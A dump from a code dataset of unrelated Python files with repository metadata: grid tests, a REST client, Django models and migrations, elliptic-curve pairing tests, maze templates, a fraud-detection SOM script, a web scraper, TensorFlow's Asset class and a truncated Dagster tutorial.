    g[-1,1] = 'Z'
    assert str(g) == 'Z.AB\n...C'
def test_grid_area():
    # area() is the bounding-box area of all set cells; it grows as cells
    # are placed further apart.
    g = SparseGrid()
    g[1,1] = 'A'
    assert g.area() == 1
    g[2,1] = 'B'
    assert g.area() == 2
    g[2,2] = 'C'
    assert g.area() == 4
    g[-1,1] = 'Z'
    assert g.area() == 8
def test_grid_count():
    # count() tallies the stored cell values into a collections.Counter.
    g = SparseGrid()
    g[1,1] = 'A'
    g[2,2] = 'A'
    g[2,1] = 'B'
    assert g.count() == collections.Counter({'A': 2, 'B': 1})
| [
"barnaby@pickle.me.uk"
] | barnaby@pickle.me.uk |
8543373d98c1f04b791fbc898524b98731cd31c2 | 490fad8eb8856c16b3d1d2e1ac3d00f5bd1280ba | /langsea/managers/category_manager.py | 5e1600baac8d6797c904a7ef17ec7107403b641f | [
"MIT"
] | permissive | blancheta/langsea | ebd12b16ff1b36d4292f527ec58f23b93deecbe7 | e268b43fb94e3234ac161f2e5d9600d51360e4b3 | refs/heads/master | 2020-12-25T14:14:49.029568 | 2016-08-20T16:31:00 | 2016-08-20T16:31:00 | 66,143,438 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 591 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
from langsea.models.category import Category
class CategoryManager:
    """Thin HTTP client for the langsea categories REST API."""

    categories_api_url = 'http://www.langsea.org/api/categories/'

    def all(self):
        """Return every category as a list of Category objects.

        Returns an empty list when the API request fails. (Previously this
        returned None on failure, which broke callers that iterate over the
        result.)
        """
        categories = []
        response = requests.get(self.categories_api_url)
        if response.ok:
            # Each JSON entry is unpacked positionally into Category's
            # constructor, so the API field order must match it.
            for category_json in response.json():
                categories.append(Category(*category_json))
        return categories

    def get(self, name):
        """Return the Category named *name*, or None when the request fails."""
        response = requests.get(self.categories_api_url + name)
        category = None
        if response.ok:
            category = Category(*response.json())
        return category
| [
"alexandreblanchet44@gmail.com"
] | alexandreblanchet44@gmail.com |
059440aacffa1c8f20a8b2ab1a4509ae258fd1a7 | 3bf32bd11cb1a9d52eb40e89d0cca3ff00b8f11f | /catalog/migrations/0004_auto_20200908_1443.py | cb2d06b580abe94c245df3cd2945c19749d55c06 | [] | no_license | poojabankapur/my_django_project | 8c608933e21ceed8e7f8dcc8d37274ebaa22435b | 1a9d7dce7b1e4ff0b3052f20b67a5c5e6a59f212 | refs/heads/master | 2022-12-12T06:23:06.398165 | 2020-09-14T10:08:54 | 2020-09-14T10:08:54 | 294,719,173 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 432 | py | # Generated by Django 3.1.1 on 2020-09-08 13:43
from django.db import migrations
class Migration(migrations.Migration):
    # Auto-generated migration: gives the Author model a default ordering of
    # (last_name, first_name) and declares the custom "can_mark_returned"
    # permission used for marking books as returned.

    dependencies = [
        ('catalog', '0003_bookinstance_borrower'),
    ]

    operations = [
        migrations.AlterModelOptions(
            name='author',
            options={'ordering': ['last_name', 'first_name'], 'permissions': (('can_mark_returned', 'Set book as returned'),)},
        ),
    ]
| [
"pbankapur@ICTs-MacBook-Pro.local"
] | pbankapur@ICTs-MacBook-Pro.local |
fc0a6b47b61e7204041f443dd3d55ac34db67122 | 7181e3d99d12a52ae77235bc2558b4a142e22aa6 | /7/wangpeng/trans/main.py | ede9e408a846dde83206e7a664536143334de01c | [
"Apache-2.0"
] | permissive | ywang412/homework-arch-4 | 2ede97e1fb400744e7108b8f9c44c3eb77b21324 | 4182448356f875398d2a2ac34092d876261e3078 | refs/heads/master | 2021-05-09T20:02:19.520761 | 2015-08-06T04:53:13 | 2015-08-06T04:53:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 786 | py | #!/usr/bin/env python
# coding=utf-8
import sys, os
import MySQLdb as mysql
import json
import hashlib
sys.path.insert(1, os.path.join(sys.path[0], '..'))
from simpleNet.nbNetFramework import nbNet, sendData_mh
# Backend address lists ("host:port" strings) for the downstream services.
save_l = ["localhost:9650", "127.0.0.1:9650"]  # saver (persistence) daemons
ff_l = ["localhost:9652", "127.0.0.1:9652"]    # fan-out/forward daemons
# Single-element mutable holders so sendData_mh can cache an open socket
# between calls (the list is passed by reference and updated in place).
saver_sock_l = [None]
ff_sock_l = [None]
def sendSaver(d_in, saver_l):
    # Forward *d_in* to one of the saver backends in *saver_l*, reusing the
    # cached socket in saver_sock_l; returns sendData_mh's result.
    return sendData_mh(saver_sock_l, saver_l, d_in)
def sendFf(d_in, saver_l):
    """Forward *d_in* to one of the fan-out backends in *saver_l*.

    Bug fix: the address-list parameter was previously ignored in favor of
    the module-level ``ff_l`` global. The only call site passes ``ff_l``, so
    behavior there is unchanged, but the argument is now honored.
    """
    return sendData_mh(ff_sock_l, saver_l, d_in)
if __name__ == '__main__':
    def logic(d_in):
        # Per-request handler for the nbNet server: fan the payload out
        # (best-effort, result ignored) then persist it via a saver daemon.
        sendFf(d_in, ff_l)
        ret = sendSaver(d_in, save_l)
        if ret:
            return("OK")
        else:
            return("ER")
        # (removed an unreachable trailing `return("OK")` — both branches
        # above already return)
    transD = nbNet('0.0.0.0', 9651, logic)
    transD.run()
| [
"pengwang18@163.com"
] | pengwang18@163.com |
342faa074eb53a041843400d7c3e767d4ba98c72 | 96c199298bb00724463dcc66ccf887008b76a9d0 | /py_pairing-master/tests/test_bn128.py | 232d20adaea0f56644df789aa2d2ad4ea4e7e4c9 | [
"MIT"
] | permissive | Yuki23329626/bilinear_pairing | 6853d93ffd93811802bce4e1f220e430707ffe7a | b5d937668bfb6794ccb612f368ae5b5221aa1e4d | refs/heads/master | 2023-04-15T05:55:17.417321 | 2021-04-20T05:19:35 | 2021-04-20T05:19:35 | 355,343,351 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,336 | py | import time
from py_ecc import bn128, optimized_bn128
print('Starting bn128 tests')
for lib in (bn128, optimized_bn128):
FQ, FQ2, FQ12, field_modulus = lib.FQ, lib.FQ2, lib.FQ12, lib.field_modulus
assert FQ(2) * FQ(2) == FQ(4)
assert FQ(2) / FQ(7) + FQ(9) / FQ(7) == FQ(11) / FQ(7)
assert FQ(2) * FQ(7) + FQ(9) * FQ(7) == FQ(11) * FQ(7)
assert FQ(9) ** field_modulus == FQ(9)
print('FQ works fine')
x = FQ2([1, 0])
f = FQ2([1, 2])
fpx = FQ2([2, 2])
one = FQ2.one()
assert x + f == fpx
assert f / f == one
assert one / f + x / f == (one + x) / f
assert one * f + x * f == (one + x) * f
assert x ** (field_modulus ** 2 - 1) == one
print('FQ2 works fine')
x = FQ12([1] + [0] * 11)
f = FQ12([1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12])
fpx = FQ12([2, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12])
one = FQ12.one()
assert x + f == fpx
assert f / f == one
assert one / f + x / f == (one + x) / f
assert one * f + x * f == (one + x) * f
# This check takes too long
# assert x ** (field_modulus ** 12 - 1) == one
print('FQ12 works fine')
G1, G2, G12, b, b2, b12, is_inf, is_on_curve, eq, add, double, curve_order, multiply = \
lib.G1, lib.G2, lib.G12, lib.b, lib.b2, lib.b12, lib.is_inf, lib.is_on_curve, lib.eq, lib.add, lib.double, lib.curve_order, lib.multiply
assert eq(add(add(double(G1), G1), G1), double(double(G1)))
assert not eq(double(G1), G1)
assert eq(add(multiply(G1, 9), multiply(G1, 5)), add(multiply(G1, 12), multiply(G1, 2)))
assert is_inf(multiply(G1, curve_order))
print('G1 works fine')
assert eq(add(add(double(G2), G2), G2), double(double(G2)))
assert not eq(double(G2), G2)
assert eq(add(multiply(G2, 9), multiply(G2, 5)), add(multiply(G2, 12), multiply(G2, 2)))
assert is_inf(multiply(G2, curve_order))
assert not is_inf(multiply(G2, 2 * field_modulus - curve_order))
assert is_on_curve(multiply(G2, 9), b2)
print('G2 works fine')
assert eq(add(add(double(G12), G12), G12), double(double(G12)))
assert not eq(double(G12), G12)
assert eq(add(multiply(G12, 9), multiply(G12, 5)), add(multiply(G12, 12), multiply(G12, 2)))
assert is_on_curve(multiply(G12, 9), b12)
assert is_inf(multiply(G12, curve_order))
print('G12 works fine')
pairing, neg = lib.pairing, lib.neg
print('Starting pairing tests')
a = time.time()
p1 = pairing(G2, G1)
pn1 = pairing(G2, neg(G1))
assert p1 * pn1 == FQ12.one()
print('Pairing check against negative in G1 passed')
np1 = pairing(neg(G2), G1)
assert p1 * np1 == FQ12.one()
assert pn1 == np1
print('Pairing check against negative in G2 passed')
assert p1 ** curve_order == FQ12.one()
print('Pairing output has correct order')
p2 = pairing(G2, multiply(G1, 2))
assert p1 * p1 == p2
print('Pairing bilinearity in G1 passed')
assert p1 != p2 and p1 != np1 and p2 != np1
print('Pairing is non-degenerate')
po2 = pairing(multiply(G2, 2), G1)
assert p1 * p1 == po2
print('Pairing bilinearity in G2 passed')
p3 = pairing(multiply(G2, 27), multiply(G1, 37))
po3 = pairing(G2, multiply(G1, 999))
assert p3 == po3
print('Composite check passed')
print('Total time for pairings: %.3f' % (time.time() - a))
| [
"michael7105@gmail.com"
] | michael7105@gmail.com |
a4e0b6eb057702056e41fe66f4ad49f9ee4bbfe4 | 520908cb844d4f26e06c36675a0aeecd1d428942 | /teachDRL/gan/maze_generators/pacman_blocks.py | 5fc2f0f55a0d6e92713be664df66a80ccd46c1cf | [
"MIT"
] | permissive | pierreosselin/teachDeepRL | 713e3b2273aafbb4adcf562f745c69854c59b808 | 51b512ce17a271a63b4d8b0780850511eb008750 | refs/heads/master | 2023-08-14T23:47:27.575306 | 2021-09-23T20:37:36 | 2021-09-23T20:37:36 | 395,716,623 | 1 | 0 | MIT | 2021-08-13T16:13:20 | 2021-08-13T16:13:18 | null | UTF-8 | Python | false | false | 5,792 | py | import numpy as np
import random
# Template blocks for maze generation. In each array, 1 appears to mark wall
# cells and 2 carved/corridor cells — TODO confirm against the maze renderer.
# Rotated/mirrored variants are derived from a few base shapes with
# np.flip (mirror) and np.transpose.
# NOTE(review): some array names do not match their actual dimensions
# (e.g. rectangle2x5 is 3x4 including the wall border).
rectangle3x3 = np.array([[1, 1, 1],
                         [1, 2, 1],
                         [1, 1, 1]])
rectangle2x5 = np.array([[1, 1, 1, 1],
                         [1, 2, 2, 1],
                         [1, 1, 1, 1]])
rectangle5x2 = np.transpose(rectangle2x5)
rectangle3x5 = np.array([[1, 1, 1, 1, 1],
                         [1, 2, 2, 2, 1],
                         [1, 1, 1, 1, 1]])
rectangle5x3 = np.transpose(rectangle3x5)
rectangle4x5 = np.array([[1, 1, 1, 1, 1, 1],
                         [1, 2, 2, 2, 2, 1],
                         [1, 1, 1, 1, 1, 1]])
rectangle5x4 = np.transpose(rectangle4x5)
L_up_right = np.array([[1, 1, 1, 1, 1],
                       [1, 2, 1, 1, 1],
                       [1, 2, 2, 2, 1],
                       [1, 1, 1, 1, 1]])
L_up_left = np.flip(L_up_right, 1)
L_down_right = np.flip(L_up_right, 0)
L_down_left = np.flip(L_up_left, 0)
L_transpose_up_right = np.transpose(L_up_right)
# NOTE(review): the *_up_left / *_down_left transposes below reuse the
# *_up_right / *_down_right source arrays — likely copy-paste; the intent
# was presumably np.transpose(L_up_left) etc. Same pattern repeats for the
# L_long, T_long, T_short and S_long families below. Confirm before fixing.
L_transpose_up_left = np.transpose(L_up_right)
L_transpose_down_right = np.transpose(L_down_right)
L_transpose_down_left = np.transpose(L_down_right)
L_long_up_right = np.array([[1, 1, 1, 1, 1, 1],
                            [1, 2, 1, 1, 1, 1],
                            [1, 2, 2, 2, 2, 1],
                            [1, 1, 1, 1, 1, 1]])
L_long_up_left = np.flip(L_long_up_right, 1)
L_long_down_right = np.flip(L_long_up_right, 0)
L_long_down_left = np.flip(L_long_up_left, 0)
L_long_transpose_up_right = np.transpose(L_long_up_right)
L_long_transpose_up_left = np.transpose(L_long_up_right)
L_long_transpose_down_right = np.transpose(L_long_down_right)
L_long_transpose_down_left = np.transpose(L_long_down_right)
T_up = np.array([[1, 1, 1, 1, 1],
                 [1, 1, 2, 1, 1],
                 [1, 2, 2, 2, 1],
                 [1, 1, 1, 1, 1]])
T_left = np.transpose(T_up)
T_down = np.flip(T_up, 0)
T_right = np.transpose(T_down)
T_long_up_right = np.array([[1, 1, 1, 1, 1, 1],
                            [1, 1, 2, 1, 1, 1],
                            [1, 2, 2, 2, 2, 1],
                            [1, 1, 1, 1, 1, 1]])
T_long_up_left = np.flip(T_long_up_right, 1)
T_long_down_right = np.flip(T_long_up_right, 0)
T_long_down_left = np.flip(T_long_up_left, 0)
T_long_transpose_up_right = np.transpose(T_long_up_right)
T_long_transpose_up_left = np.transpose(T_long_up_right)
T_long_transpose_down_right = np.transpose(T_long_down_right)
T_long_transpose_down_left = np.transpose(T_long_down_right)
T_short_up_right = np.array([[1, 1, 1, 1],
                             [1, 2, 1, 1],
                             [1, 2, 2, 1],
                             [1, 1, 1, 1]])
T_short_up_left = np.flip(T_short_up_right, 1)
T_short_down_right = np.flip(T_short_up_right, 0)
T_short_down_left = np.flip(T_short_up_left, 0)
T_short_transpose_up_right = np.transpose(T_short_up_right)
T_short_transpose_up_left = np.transpose(T_short_up_right)
T_short_transpose_down_right = np.transpose(T_short_down_right)
T_short_transpose_down_left = np.transpose(T_short_down_right)
S_up = np.array([[1, 1, 1, 1, 1],
                 [1, 2, 2, 1, 1],
                 [1, 1, 2, 2, 1],
                 [1, 1, 1, 1, 1]])
S_left = np.transpose(S_up)
S_down = np.flip(S_up, 0)
S_right = np.transpose(S_down)
S_long_up_right = np.array([[1, 1, 1, 1, 1, 1],
                            [1, 1, 2, 1, 1, 1],
                            [1, 2, 2, 2, 2, 1],
                            [1, 1, 1, 1, 1, 1]])
S_long_up_left = np.flip(S_long_up_right, 1)
S_long_down_right = np.flip(S_long_up_right, 0)
S_long_down_left = np.flip(S_long_up_left, 0)
S_long_transpose_up_right = np.transpose(S_long_up_right)
S_long_transpose_up_left = np.transpose(S_long_up_right)
S_long_transpose_down_right = np.transpose(S_long_down_right)
S_long_transpose_down_left = np.transpose(S_long_down_right)
# The pool PacmanBlock draws from; the plain rectangles are commented out.
all_blocks = [#rectangle3x3, rectangle2x5, rectangle5x2, rectangle5x3, rectangle5x3, rectangle5x4, rectangle5x4,
              L_up_right, L_up_left, L_down_right, L_down_left,
              L_transpose_up_right, L_transpose_up_left, L_transpose_down_right, L_transpose_down_left,
              L_long_up_right, L_long_up_left, L_long_down_right, L_long_down_left,
              L_long_transpose_up_right, L_long_transpose_up_left, L_long_transpose_down_right, L_long_transpose_down_left,
              T_up, T_left, T_down, T_right, S_up, S_left, S_down, S_right,
              T_long_up_right, T_long_up_left, T_long_down_right, T_long_down_left,
              T_long_transpose_up_right, T_long_transpose_up_left, T_long_transpose_down_right, T_long_transpose_down_left,
              T_short_up_right, T_short_up_left, T_short_down_right, T_short_down_left,
              T_short_transpose_up_right, T_short_transpose_up_left, T_short_transpose_down_right, T_short_transpose_down_left,
              S_long_up_right, S_long_up_left, S_long_down_right, S_long_down_left,
              S_long_transpose_up_right, S_long_transpose_up_left, S_long_transpose_down_right, S_long_transpose_down_left,]
class PacmanBlock():
    """Random supplier of template blocks (from `all_blocks`) for maze
    generation."""
    def __init__(self, dense=True):
        self.blocks = all_blocks
        if dense:
            # NOTE(review): this branch is a no-op shallow copy — `dense`
            # currently has no effect on which blocks are kept. Presumably a
            # filter was intended here; confirm before changing.
            self.blocks = [block for block in self.blocks]
        self.num_blocks = len(self.blocks)
    def get_block(self, shape_max = None):
        # Pick a random block, optionally restricted to blocks that fit in a
        # (rows, cols) bounding box. Returns None when no block fits.
        if shape_max is not None:
            blocks = [block for block in self.blocks if block.shape[0] <= shape_max[0] and block.shape[1] <= shape_max[1]]
        else:
            blocks = self.blocks
        if len(blocks) == 0:
            return None
        block = random.choice(blocks)
        # Randomly drop either the last row or the first column — presumably
        # so adjacent blocks can share a wall line; TODO confirm intent.
        block = random.choice([block[:-1, :], block[:, 1:]])
        return block
if __name__ == '__main__':
    # Manual smoke test: print one unconstrained and one size-constrained block.
    p = PacmanBlock()
    print(p.get_block())
    print(p.get_block(shape_max = (3,3)))
| [
"pierre.osselin@gmail.com"
] | pierre.osselin@gmail.com |
c4d0070b71718c580c72e76d286979f11962b509 | bab394bc828702663baef346fe65e3cbe592121e | /get_id.py | 410448e820bbd61217022470dd8194ef382d0d92 | [] | no_license | hilting/9sig | 79ba22ac377f630a440e6424f5f98f49ccdbe7bf | 1b4390206d9d9d4277687083d5447bede1b00fcd | refs/heads/master | 2020-03-06T14:16:59.440043 | 2018-05-10T07:05:05 | 2018-05-10T07:05:05 | 126,932,995 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 556 | py | # coding: utf-8
import urllib.request
from xml.etree.ElementTree import *
def get_id(url):
    """Open *url* (a PubMed ESearch query) and return the raw HTTP response."""
    response = urllib.request.urlopen(url)
    return response
def main():
    """Query PubMed's ESearch API for all record IDs and print one per line.

    The huge ``retmax`` asks the API to return every matching ID in a single
    XML response.
    """
    keyword = "all[filter]"
    baseURL = "http://eutils.ncbi.nlm.nih.gov/entrez/eutils/esearch.fcgi?db=pubmed&retmax=28389011&term="
    url = baseURL + keyword
    result = get_id(url)
    element = fromstring(result.read())
    # (removed an unused `filename` variable left over from a version that
    # wrote the IDs to a file)
    for e in element.findall(".//Id"):
        print (e.text)
if __name__ == "__main__":
    main()  # entry point when run as a script
| [
"to1216goo@gmail.com"
] | to1216goo@gmail.com |
d3270efae30d0bd295cd3e3f2a19feb5ea441aca | 719fd713fbe76af8d7a957ceb3f8857daeeca2cd | /users/models.py | 8b0e1f4375bd40b00e375b3ceb0529b3d7ba176d | [] | no_license | geraldbryan/DayDreams | bf6a6008fc64012bfbd72a02feaffb8de53507c8 | 1408b4eb54147e676d25ad27701f21b70fdb7ddc | refs/heads/master | 2023-06-07T08:31:32.891910 | 2021-07-09T08:41:42 | 2021-07-09T08:41:42 | 384,371,163 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 620 | py | from django.db import models
from django.contrib.auth.models import User
from PIL import Image
class Profile(models.Model):
    # One profile per Django auth user; removed together with the user.
    user = models.OneToOneField(User, on_delete=models.CASCADE)
    # Avatar image; falls back to default.jpg when none is uploaded.
    image = models.ImageField(default='default.jpg',upload_to='profile_pics')
    def __str__(self):
        return f'{self.user.username} Profile'
    def save(self, *args, **kwargs):
        # After the normal save, downscale oversized avatars in place so the
        # stored file never exceeds 300x300 pixels (thumbnail keeps aspect
        # ratio).
        super().save(*args, **kwargs)
        img = Image.open(self.image.path)
        if img.height > 300 or img.width > 300:
            output_size = (300,300)
            img.thumbnail(output_size)
            img.save(self.image.path)
| [
"geraldbryan9914@gmail.com"
] | geraldbryan9914@gmail.com |
f2baaf3156daf238102ec6521a31dcbcc7642cee | e344705eb6b8bae2e06cd658f540219f8b6e7973 | /baidubaike/baike/spiders/swg.py | 371bfbaef8481e3c4ee900d995b1ab173d8d4702 | [] | no_license | dustw/my-scrapy | 023211f1d32b2883ef58249ec528ec15658db86d | 7263680cfa16e2615187b745c97fbc3cacf3780a | refs/heads/master | 2020-04-11T21:13:45.622353 | 2017-08-23T02:49:31 | 2017-08-23T02:49:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 944 | py |
# -*- coding: utf-8 -*-
import scrapy
from baike.items import SWGItem
class SwgSpider(scrapy.Spider):
    """Scrapy spider crawling chazidian.com's science Q&A listing pages and
    yielding SWGItem question/answer pairs."""
    name = "swg"
    allowed_domains = ["chazidian.com"]
    def start_requests(self):
        # Seed requests for listing pages 1..63 (range upper bound exclusive).
        for i in range(1, 64):
            url = "https://www.chazidian.com/kepu-1/%s/"
            url %= str(i)
            yield scrapy.Request(url=url, callback=self.parse)
    def parse(self, response):
        # Follow every article link found on a listing page.
        info_urls = response.xpath("//ul[@class='common']//li//a/@href").extract()
        for each in info_urls:
            yield scrapy.Request(url=each, callback=self.parse_item)
    def parse_item(self, response):
        # Extract the question title and concatenated answer paragraphs.
        print(response.url)
        question = response.xpath("//span[@id='print_title']//text()").extract()[0]
        answer = "".join(response.xpath("//div[@id='print_content']/p/text()").extract()).strip()
        item = SWGItem()
        item['question'] = question
        item['answer'] = answer
        yield item
"azraelkuan@gmail.com"
] | azraelkuan@gmail.com |
1721190f8b16788f28f27201dfa5c446cc4a8387 | 45983984d5c2b655e2e3b13538e3c93993c41649 | /fourm/migrations/0003_auto_20200518_1646.py | 232abdad560d2bcf24fef31b28808627053cf7da | [] | no_license | Code-Institute-Submissions/reddevil-it | 14c172ddd13c2796250108221b9dafe67306eff3 | 57dc4561382086cd7847058cc6f754c24c04316d | refs/heads/master | 2022-11-16T10:59:26.757803 | 2020-07-03T20:48:58 | 2020-07-03T20:48:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 446 | py | # Generated by Django 3.0.6 on 2020-05-18 15:46
from django.db import migrations
class Migration(migrations.Migration):
    # Auto-generated migration: orders comments newest-first and drops the
    # Comment.author field.

    dependencies = [
        ('fourm', '0002_comment'),
    ]

    operations = [
        migrations.AlterModelOptions(
            name='comment',
            options={'ordering': ['-created_date']},
        ),
        migrations.RemoveField(
            model_name='comment',
            name='author',
        ),
    ]
| [
"plyn99@gmail.com"
] | plyn99@gmail.com |
17155a2faf01fd4d1b8ef2bd64c48e450adac8c7 | 8aa04db29bae5e0391543349eb2c0f778c56ffae | /tensorflow/python/trackable/asset.py | c218f7240e4f29d6e95140050581981776c3b287 | [
"Apache-2.0",
"LicenseRef-scancode-generic-cla",
"BSD-2-Clause"
] | permissive | mansnils/tensorflow | ec1a840f8fca6742d6e54dcf7b00eae0180f4023 | b0164f014fd4f1b5af2c7b578aa7687198c5d92e | refs/heads/master | 2023-01-30T00:13:07.772844 | 2023-01-09T09:45:45 | 2023-01-09T09:49:49 | 226,075,754 | 1 | 0 | Apache-2.0 | 2019-12-05T10:27:38 | 2019-12-05T10:27:37 | null | UTF-8 | Python | false | false | 4,278 | py | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Asset-type Trackable object."""
import os
from tensorflow.python.eager import context
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.lib.io import file_io
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.saved_model import path_helpers
from tensorflow.python.trackable import base
from tensorflow.python.util.tf_export import tf_export
@tf_export("saved_model.Asset")
class Asset(base.Trackable):
  """Represents a file asset to hermetically include in a SavedModel.
  A SavedModel can include arbitrary files, called assets, that are needed
  for its use. For example a vocabulary file used initialize a lookup table.
  When a trackable object is exported via `tf.saved_model.save()`, all the
  `Asset`s reachable from it are copied into the SavedModel assets directory.
  Upon loading, the assets and the serialized functions that depend on them
  will refer to the correct filepaths inside the SavedModel directory.
  Example:
  ```
  filename = tf.saved_model.Asset("file.txt")
  @tf.function(input_signature=[])
  def func():
    return tf.io.read_file(filename)
  trackable_obj = tf.train.Checkpoint()
  trackable_obj.func = func
  trackable_obj.filename = filename
  tf.saved_model.save(trackable_obj, "/tmp/saved_model")
  # The created SavedModel is hermetic, it does not depend on
  # the original file and can be moved to another path.
  tf.io.gfile.remove("file.txt")
  tf.io.gfile.rename("/tmp/saved_model", "/tmp/new_location")
  reloaded_obj = tf.saved_model.load("/tmp/new_location")
  print(reloaded_obj.func())
  ```
  Attributes:
    asset_path: A path, or a 0-D `tf.string` tensor with path to the asset.
  """
  def __init__(self, path):
    """Record the full path to the asset."""
    if isinstance(path, os.PathLike):
      path = os.fspath(path)
    # The init_scope prevents functions from capturing `path` in an
    # initialization graph, since it is transient and should not end up in a
    # serialized function body.
    with ops.init_scope(), ops.device("CPU"):
      self._path = ops.convert_to_tensor(
          path, dtype=dtypes.string, name="asset_path")
  @property
  def asset_path(self):
    """Fetch the current asset path."""
    return self._path
  @classmethod
  def _deserialize_from_proto(cls, object_proto, export_dir, asset_file_def,
                              **unused_kwargs):
    """Rebuild an Asset when loading a SavedModel.

    Resolves the asset's filename (recorded in `asset_file_def`) relative to
    the SavedModel's assets directory, so the restored Asset points inside
    the loaded model directory.
    """
    proto = object_proto.asset
    filename = file_io.join(
        path_helpers.get_assets_dir(export_dir),
        asset_file_def[proto.asset_file_def_index].filename)
    asset = cls(filename)
    if not context.executing_eagerly():
      # In graph mode, register the path so initializers can feed it.
      ops.add_to_collection(ops.GraphKeys.ASSET_FILEPATHS, asset.asset_path)
    return asset
  def _add_trackable_child(self, name, value):
    # Attach restored children directly as attributes.
    setattr(self, name, value)
  def _export_to_saved_model_graph(self, tensor_map, **unused_kwargs):
    """Map the asset path to a placeholder-initialized resource variable so
    the serialized graph can be re-pointed at the copied asset on load."""
    # TODO(b/205008097): Instead of mapping 1-1 between trackable asset
    # and asset in the graph def consider deduping the assets that
    # point to the same file.
    asset_path_initializer = array_ops.placeholder(
        shape=self.asset_path.shape,
        dtype=dtypes.string,
        name="asset_path_initializer")
    asset_variable = resource_variable_ops.ResourceVariable(
        asset_path_initializer)
    tensor_map[self.asset_path] = asset_variable
    return [self.asset_path]
# Allow Asset objects to be used anywhere a tensor is expected by converting
# them to their (string) asset path tensor.
ops.register_tensor_conversion_function(
    Asset, lambda asset, **kw: ops.convert_to_tensor(asset.asset_path, **kw))
| [
"gardener@tensorflow.org"
] | gardener@tensorflow.org |
2b088e0ff1d83996a411c99f34c71c0535824b69 | 739ed6d193d5d524777d88dbebb0dd86b09a0002 | /04_Self_Organizing_Maps/som2.py | 53a8f33246f74e820ef8ca892e44938a6a657320 | [] | no_license | gnzeleven/Introduction-to-Deep-Learning | 0480963ea4b722a310d180c7d66ff53db9cbf5d5 | dbf5db18b7c8e77562bbbeb9a51c675b8b946665 | refs/heads/master | 2022-04-26T15:26:02.973164 | 2020-04-29T07:32:17 | 2020-04-29T07:32:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,099 | py | # -*- coding: utf-8 -*-
import numpy as np
import pandas as pd
# Import the dataset: last column is the label, the rest are features.
df = pd.read_csv("Credit_Card_Applications.csv")
X = df.iloc[:,:-1].values
y = df.iloc[:,-1].values
# Feature Scaling to [0, 1] (required for SOM distance computations).
from sklearn.preprocessing import MinMaxScaler
scaler = MinMaxScaler(feature_range=(0,1))
X = scaler.fit_transform(X)
# Training the SOM: a 10x10 map over the 15 input features.
from minisom import MiniSom
som_model = MiniSom(x=10, y=10, input_len=15, sigma=1.0, learning_rate=0.5)
som_model.random_weights_init(X)
som_model.train_random(data=X, num_iteration=200)
# Visualizing the results: plot the inter-neuron distance map, then mark each
# sample on its winning neuron ('o'/red vs 's'/green keyed by its y label).
from pylab import bone, pcolor, colorbar, plot, show
bone()
pcolor(som_model.distance_map().T)
colorbar()
markers = ['o','s']
colors = ['r','g']
for i,x in enumerate(X):
    w = som_model.winner(x)
    plot(w[0]+0.5,
         w[1]+0.5,
         markers[y[i]],
         markeredgecolor=colors[y[i]],
         markerfacecolor='None',
         markersize=10,
         markeredgewidth=2)
show()
# Cherry-picking the frauds: samples mapped to the outlier neuron.
# NOTE(review): the (8,5) coordinates were presumably read off the distance
# map by hand — they must be re-checked whenever the SOM is retrained.
mappings = som_model.win_map(X)
likely_frauds = mappings[(8,5)]
likely_frauds = scaler.inverse_transform(likely_frauds)
| [
"vsav4796@gmail.com"
] | vsav4796@gmail.com |
4befe135006f88eaa43f75a4a79d805a6d066eaa | 6188f8ef474da80c9e407e8040de877273f6ce20 | /examples/docs_snippets/docs_snippets/guides/dagster/asset_tutorial/non_argument_deps.py | 9d15421d4ee2978a194a43bb4d650ad0f3abb1eb | [
"Apache-2.0"
] | permissive | iKintosh/dagster | 99f2a1211de1f3b52f8bcf895dafaf832b999de2 | 932a5ba35263deb7d223750f211c2ddfa71e6f48 | refs/heads/master | 2023-01-24T15:58:28.497042 | 2023-01-20T21:51:35 | 2023-01-20T21:51:35 | 276,410,978 | 1 | 0 | Apache-2.0 | 2020-07-01T15:19:47 | 2020-07-01T15:13:56 | null | UTF-8 | Python | false | false | 2,104 | py | """isort:skip_file"""
import csv
import requests
from dagster import asset
@asset
def cereals():
    # Download the cereal dataset and parse it into a list of dicts, one per
    # CSV row (keys come from the header row).
    response = requests.get("https://docs.dagster.io/assets/cereal.csv")
    lines = response.text.split("\n")
    return [row for row in csv.DictReader(lines)]
@asset
def nabisco_cereals(cereals):
    """Cereals whose manufacturer code ("mfr") is "N", i.e. Nabisco."""
    nabisco_only = [cereal for cereal in cereals if cereal["mfr"] == "N"]
    return nabisco_only
@asset
def cereal_protein_fractions(cereals):
    """
    For each cereal, records its protein content as a fraction of its total mass.
    """
    # 28.35 converts the "weight" column to grams (presumably ounces -> grams,
    # matching the original constant).
    return {
        cereal["name"]: float(cereal["protein"]) / (float(cereal["weight"]) * 28.35)
        for cereal in cereals
    }
@asset
def highest_protein_nabisco_cereal(nabisco_cereals, cereal_protein_fractions):
    """
    The name of the Nabisco cereal with the highest protein fraction.
    """
    ranked = sorted(
        nabisco_cereals,
        key=lambda cereal: cereal_protein_fractions[cereal["name"]],
    )
    top_cereal = ranked[-1]
    return top_cereal["name"]
# cereal_ratings_zip_start
import urllib.request
@asset
def cereal_ratings_zip() -> None:
    # Download the zipped ratings CSV into the working directory. This asset
    # is represented by the file it leaves on disk, not by a return value.
    urllib.request.urlretrieve(
